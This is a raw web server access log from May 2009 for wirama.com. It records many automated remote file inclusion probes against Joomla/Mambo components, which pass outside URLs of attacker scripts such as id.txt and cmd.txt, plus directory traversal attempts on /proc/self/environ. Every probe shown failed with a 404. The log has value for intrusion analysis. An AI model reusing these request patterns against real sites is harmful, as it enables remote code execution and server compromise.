207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
121.173.130.41 - - [02/May/2009:13:07:22 -0700] "GET /logs/access.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
221.157.225.65 - - [02/May/2009:13:10:22 -0700] "GET /admin/templates/template_thumbnail.php?thumb_template=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
221.157.225.65 - - [02/May/2009:13:10:22 -0700] "GET /logs//admin/templates/template_thumbnail.php?thumb_template=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
221.157.225.65 - - [02/May/2009:13:10:22 -0700] "GET /logs/access_090401.log//admin/templates/template_thumbnail.php?thumb_template=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:13:10:31 -0700] "GET /logs/access_090329.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:13:10:32 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.206.183.148 - - [02/May/2009:13:29:36 -0700] "GET /logs/access_090331.log//com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
91.206.183.148 - - [02/May/2009:13:29:37 -0700] "GET /com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
91.206.183.148 - - [02/May/2009:13:29:37 -0700] "GET /logs//com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
121.165.73.157 - - [02/May/2009:13:30:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:13:30:17 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:13:30:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.206.183.148 - - [02/May/2009:13:34:02 -0700] "GET /logs/access_090330.log//com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
207.57.79.26 - - [02/May/2009:13:38:13 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:38:13 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:38:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:38:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:38:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:38:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
62.116.168.108 - - [02/May/2009:13:59:53 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.116.168.108 - - [02/May/2009:13:59:53 -0700] "GET /logs/access_090401.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.116.168.108 - - [02/May/2009:13:59:53 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
76.74.159.200 - - [02/May/2009:14:00:03 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.74.159.200 - - [02/May/2009:14:00:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.74.159.200 - - [02/May/2009:14:00:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.116.168.108 - - [02/May/2009:14:02:30 -0700] "GET /logs/access_090301.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
86.109.98.47 - - [02/May/2009:14:17:18 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
86.109.98.47 - - [02/May/2009:14:17:18 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
62.116.168.108 - - [02/May/2009:14:23:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.116.168.108 - - [02/May/2009:14:23:57 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.116.168.108 - - [02/May/2009:14:23:57 -0700] "GET /logs/access_090401.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.213.0.1 - - [02/May/2009:14:24:33 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.213.0.1 - - [02/May/2009:14:24:34 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
83.226.184.228 - - [02/May/2009:14:45:59 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:45:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:45:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:30 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [02/May/2009:14:46:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.229.68.219 - - [02/May/2009:14:58:39 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
94.229.68.219 - - [02/May/2009:14:58:39 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
200.213.0.1 - - [02/May/2009:14:59:59 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.213.0.1 - - [02/May/2009:14:59:59 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.213.0.1 - - [02/May/2009:15:00:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.213.0.1 - - [02/May/2009:15:03:44 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:12:45 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:12:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:12:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.44.188 - - [02/May/2009:15:16:56 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [02/May/2009:15:16:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [02/May/2009:15:16:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
74.6.17.163 - - [02/May/2009:15:31:00 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:41:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:41:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:41:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/May/2009:15:45:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.6.17.163 - - [02/May/2009:15:49:45 -0700] "GET /logs/access_090101.log HTTP/1.0" 200 7270 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:16 -0700] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:16 -0700] "GET /logs/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:16 -0700] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:24 -0700] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:24 -0700] "GET /logs/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:15:59:24 -0700] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
86.109.98.47 - - [02/May/2009:16:08:45 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
86.109.98.47 - - [02/May/2009:16:08:45 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
84.1.102.190 - - [02/May/2009:16:11:22 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
84.1.102.190 - - [02/May/2009:16:11:22 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
84.1.102.190 - - [02/May/2009:16:11:22 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.230.157 - - [02/May/2009:16:18:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.230.157 - - [02/May/2009:16:18:00 -0700] "GET /logs/access_090401.log HTTP/1.1" 200 74403 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:02 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:02 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:02 -0700] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:02 -0700] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:03 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:03 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:03 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:35:03 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
65.55.106.194 - - [02/May/2009:16:39:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.194 - - [02/May/2009:16:40:38 -0700] "GET /logs/ HTTP/1.0" 200 1929 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:45 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:45 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
195.159.73.78 - - [02/May/2009:16:55:46 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
82.146.39.200 - - [02/May/2009:16:55:55 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [02/May/2009:16:55:55 -0700] "GET /spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [02/May/2009:16:55:59 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [02/May/2009:16:55:59 -0700] "GET /spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET /logs/access.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET /logs/access.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:16:59:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [02/May/2009:17:00:14 -0700] "GET /logs/access.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
